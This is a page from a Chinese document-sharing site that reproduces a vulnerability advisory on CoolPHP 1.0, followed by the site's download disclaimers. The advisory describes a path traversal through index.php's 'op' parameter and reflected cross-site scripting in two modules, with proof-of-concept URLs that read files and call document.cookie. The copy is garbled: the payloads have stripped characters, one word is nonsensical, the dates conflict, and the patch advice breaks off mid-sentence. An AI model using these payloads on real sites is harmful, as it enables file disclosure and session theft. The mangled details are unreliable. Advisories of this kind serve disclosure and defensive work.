CoolPHP远程任意文件查看及脚本执行漏洞

上传人：1*** IP属地：黑龙江上传时间：2023-06-21 格式：DOCX 页数：3 大小：16.15KB 积分：3.6 举报 版权申诉

全文预览已结束

 下载本文档

版权说明：本文档由用户提供并上传，收益归属内容提供方，若内容存在侵权，请进行举报或认领

第第页CoolPHP远程任意文件查看及脚本执行漏洞CoolPHP远程任意文件查看及脚本执行漏洞

发表于：2023-05-25来源：：点击数：标签：脚本CoolPHP任意查看文件

受影响系统：CoolPHPCoolPHP1.0描述：CoolPHP是一款基于PHP的网站构建系统。CoolPHP多处没有正确验证用户提交的输入，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令或进行脚本执行攻击。'index.php'对用户提交给"op"参数的数据

受影响系统：CoolPHPCoolPHP1.0描述：CoolPHP是一款基于PHP的网站构建系统。

CoolPHP多处没有正确验证用户提交的输入，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令或进行脚本执行攻击。

'index.php'对用户提交给"op"参数的数据缺少充分锅炉，提交包含多个'../'的字符作为参数数据，可绕过WEBROOT限制以系统权限查看文件内容。

另外对'buscar'模块的'query'参数和'userinfo'模块的'nick'参数缺少充分HTML代码检查，构建恶意链接，诱使用户访问，可能泄露用户敏感信息。

*来源：R00tCr4ck（root@）

链接：_blank>/alerts/2023/Oct/1011748.html

（测试）方法：警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

R00tCr4ck（root@）提供了如下（测试方法）：

查看文件内容信息：

http://[victim]/index.php?op=../../../../anotheruser/evilfile

跨站脚本攻击：

http://[victim]/index.php?op=buscarquery=scriptlanguage=javascriptwindow.alert(document.cookie);/script

http://[victim]/index.php?op=buscarquery=%3Cscript%20language=（java）script%3Ewindow.alert%28document.cookie%29;%3C/script%3E

http://[victim]/index.php?op=userinfonick=scriptlanguage=javascriptwindow.alert(document.cookie);/script

建议：厂商补丁：

CoolPHP

目前厂商还没有提供补丁或者升级程序，我们建议

人人文库> 全部分类> 图纸下载 > 毕业设计

1. 本站所有资源如无特殊说明，都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
2. 本站的文档不包含任何第三方提供的附件图纸等，如果需要附件，请联系上传者。文件的所有权益归上传用户所有。
3. 本站RAR压缩包中若带图纸，网页内容里面会有图纸预览，若没有图纸预览就没有图纸。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 人人文库网仅提供信息存储空间，仅对用户上传内容的表现方式做保护处理，对用户上传分享的文档内容本身不做任何修改或编辑，并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容，请与我们联系，我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。